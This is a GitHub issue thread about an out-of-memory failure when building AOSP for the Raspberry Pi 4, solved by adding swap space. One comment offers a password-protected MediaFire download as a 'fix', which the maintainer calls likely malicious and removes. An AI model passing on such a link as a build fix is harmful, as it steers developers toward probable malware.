raspberry-vanilla/android_local_manifest #117: FAILED: out/soong/build.aosp_rpi4.ninja

Marietto2008, 2024-08-31:
Hello.

I'm trying to compile your raspberry-vanilla for the raspberry pi 4 on Ubuntu 24.04. The compilation does not work. This is what happens :

```
[W][2024-08-31T06:20:15+0200][1821199] logParams():267 Process will be UID/EUID=0 in the global user namespace, and will have user root-level access to files

[W][2024-08-31T06:20:15+0200][1821199] logParams():277 Process will be GID/EGID=0 in the global user namespace, and will have group root-level access to files
[100% 1164/1164] analyzing Android.bp files and generating ninja file at out/soong/build.aosp_rpi4.n

FAILED: out/soong/build.aosp_rpi4.ninja

cd "$(dirname "out/host/linux-x86/bin/soong_build")" && BUILDER="$PWD/$(basename "out/host/linux-x86/bin/soong_build")" && cd / && env -i  "$BUILDER"     --top "$TOP"     --soong_out "out/soong"     --out "out"     --soong_variables out/soong/soong.aosp_rpi4.variables -o out/soong/build.aosp_rpi4.ninja --globListDir aosp_rpi4 --globFile out/soong/globs-aosp_rpi4.ninja -l out/.module_paths/Android.bp.list --available_env out/soong/soong.environment.available --used_env out/soong/soong.environment.used.aosp_rpi4.build Android.bp

Killed
06:44:47 soong bootstrap failed with: exit status 1

#### failed to build some targets (25:53 (mm:ss)) ####

namespace, and will have group root-level access to files
```

rickdoq, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

Marietto2008, 2024-08-31:
what's that ? I'm not using Windows...

KonstaT, 2024-08-31:
> what's that ? I'm not using Windows...

Likely something malicious so I removed the comment.

As for the original issue, have you also installed the packages required in establishing AOSP build environment (https://source.android.com/docs/setup/start/requirements)?

Marietto2008, 2024-08-31:
I've been able to fix the problem by adding swap space. This is the tutorial that I've followed :

https://www.digitalocean.com/community/tutorials/how-to-add-swap-space-on-debian-11

KonstaT, 2024-08-31:
Hardware requirements for building AOSP (https://source.android.com/docs/setup/start/requirements#hardware-requirements) state 64 GB of RAM but you can get away with less if you use a swap file.

closed 2024-08-31 by KonstaT